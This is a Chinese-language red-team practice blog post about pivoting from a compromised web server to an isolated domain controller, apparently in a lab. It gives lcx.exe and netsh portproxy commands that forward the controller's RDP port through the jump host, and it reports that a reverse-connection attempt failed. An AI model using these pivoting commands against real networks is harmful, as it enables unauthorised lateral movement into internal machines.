红队笔记Day2 --＞上线不出网机器

今天就来讲一下在企业攻防中如何上线不出网的机器！！

1.基本网络拓扑

基本的网络拓扑就是这样

以下是对应得的P信息，其中的52网段充当一个内网的网段，而111充当公网网段

  

先ping一下，确保外网ping不通内网，内网ping不通外网

我的电脑：

DC ：

2.端口转发（正向TCP连接）

首先要确保的是DC的3389端口是开启的（不开启的话还要去黑掉它让他开启）

这里我选择采用lcx进行端口转发  ，首先肯定是将lcx扔到web机器上面的，然后有以下命令

lcx.exe -tran  8888 192.168.52.138  3389

这个意思就是将 192.168.52.138的3389端口转发到web本地机器的8888端口，然后去连接就好

从这里也可以看到外网111.1网段的流量被转发到了内网52.128的3389上

 能成功上线到DC上

3.端口转发（反向连接）

这个反向连接，也就是我们常说的反弹shell，条件较为苛刻，需要同时运行lcx

先对于web跳板机的命令,意为开启本地的8888端口来监听6666端口（本地端口转发）

lcx.exe -listen 6666 8888 

然后就是在DC上的命令，请求52.143的6666端口来连接本地的3389

lcx.exe -listen 192.168.52.143 6666 127.0.0.1 8888

这样子，内网的端口直接的通信就已经搭建好了

然后我们去主动连接192.168.111.128的8888端口就好

但是这样似乎是会有一些问题，会卡死连不上去

于是我去web跳板机上面看一了一下流量 发现52.138的流量并不是从3389出来的

但是DC上的流量确实是从666出去的 那这样就很奇怪了    正常来说应该52.138在web上看见的是3389端口啊，

有点抽象      failed~~ 可能是不知道哪一步出错了

3.不用工具的端口转发

有人就会问了，md，这么麻烦，就不能不上传工具吗？ 当然是有方法的啦

你只需要在web服务器上敲上这样一句命令

netsh interface portproxy add v4tov4 listenaddress=0.0.0.0 listenport=8888 connectport=3389 connectaddress=192.168.52.138

 这样也是一种端口转发的方法噢，不需要工具

这种也是一种端口转发的正向连接噢

summarization：反向tcp连接没成功，不知道哪里出错了，当然了上线不出网机器可远远不止这一种，明天就更一些别的上线不出网机器的做法！！